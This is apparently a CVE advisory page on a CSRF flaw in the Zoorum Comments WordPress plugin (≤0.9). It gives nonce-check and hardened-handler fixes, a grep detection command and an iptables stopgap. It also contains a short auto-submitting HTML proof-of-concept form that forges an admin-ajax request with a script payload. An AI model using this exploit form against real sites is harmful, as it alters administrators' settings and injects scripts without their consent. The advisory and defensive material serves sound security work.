The Zoorum Comments plugin (≤ v0.9) fails to validate nonces in the `zoorum_set_options()` function, so requests to it can be forged. When a logged-in admin clicks a malicious link, the attacker-supplied request executes with the admin's privileges and without their consent, modifying settings or injecting scripts, because no CSRF protection is present.
DailyCVE Form
Platform: WordPress
Version: ≤0.9
Vulnerability: CSRF
Severity: Medium
Date: 03/28/2025
What Undercode Says:
Exploit:
```html
<!-- Malicious CSRF PoC -->
<form action="http://target/wp-admin/admin-ajax.php" method="POST">
  <input type="hidden" name="action" value="zoorum_set_options">
  <input type="hidden" name="payload" value="<script>alert(1)</script>">
</form>
<script>document.forms[0].submit();</script>
```
Protection:
1. Patch via plugin update.
2. Add nonce checks:
```php
function zoorum_set_options() {
    // Reject the request unless it carries a valid nonce for the 'zoorum_nonce'
    // action. The hidden field name is assumed to be '_wpnonce', the default
    // emitted by wp_nonce_field(); adjust it to match the plugin's form.
    if ( ! isset( $_POST['_wpnonce'] ) || ! wp_verify_nonce( $_POST['_wpnonce'], 'zoorum_nonce' ) ) {
        wp_die( 'Invalid nonce' );
    }
    // Rest of logic
}
```
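A fuller hardened handler, added here as an example and not the Zoorum plugin's own code: it shows the nonce being issued on the settings form, verified in the admin-ajax action, and backed by a capability check and input sanitisation. Function, option and nonce-field names are assumed.

```php
<?php
// Added example, not the plugin's code. Names prefixed zoorum_example_ and the
// option 'zoorum_api_key' / field 'zoorum_nonce_field' are assumptions.

// 1. Emit the nonce into the settings form so legitimate submissions carry it.
function zoorum_example_settings_form() {
    echo '<form method="post" action="' . esc_url( admin_url( 'admin-ajax.php' ) ) . '">';
    echo '<input type="hidden" name="action" value="zoorum_set_options">';
    wp_nonce_field( 'zoorum_nonce', 'zoorum_nonce_field' ); // hidden field name assumed
    echo '<input type="text" name="zoorum_api_key">';       // option name assumed
    submit_button( 'Save' );
    echo '</form>';
}

// 2. Register the handler for authenticated users only: no wp_ajax_nopriv_
//    variant, so anonymous requests never reach it.
add_action( 'wp_ajax_zoorum_set_options', 'zoorum_example_set_options' );

function zoorum_example_set_options() {
    // Nonce check: a cross-site page cannot read the victim's per-session token,
    // so a forged form like the PoC above fails here. check_ajax_referer()
    // responds with HTTP 403 and stops execution when the nonce is missing or stale.
    check_ajax_referer( 'zoorum_nonce', 'zoorum_nonce_field' );

    // Capability check: a valid nonce from a low-privilege user must still not
    // be enough to change plugin settings.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'Insufficient permissions', 403 );
    }

    // Sanitise before storing: saving raw request data is what lets a forged
    // request turn into injected script on the settings page.
    $api_key = isset( $_POST['zoorum_api_key'] )
        ? sanitize_text_field( wp_unslash( $_POST['zoorum_api_key'] ) )
        : '';

    update_option( 'zoorum_api_key', $api_key );
    wp_send_json_success( 'Options saved' );
}
```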
Analytics:
- CVSS: 6.5 (Medium)
- Attack Vector: Network
- Privileges Required: None
- User Interaction: Required
Detection:
Grep for the vulnerable function:

```shell
grep -r "function zoorum_set_options" /var/www/html/
```
Mitigation Commands:
Temporary fix: restrict HTTP access to a trusted IP (the negation belongs before `-s`; replace `TRUSTED_IP` with your address). Note that this blocks every other visitor, so it is only a stopgap while patching, and it does not stop a forged request that the admin's own browser sends from the trusted address.

```shell
iptables -A INPUT -p tcp --dport 80 ! -s TRUSTED_IP -j DROP
```
References:
Reported By: https://nvd.nist.gov/vuln/detail/CVE-2025-2163
Extra Source Hub:
Undercode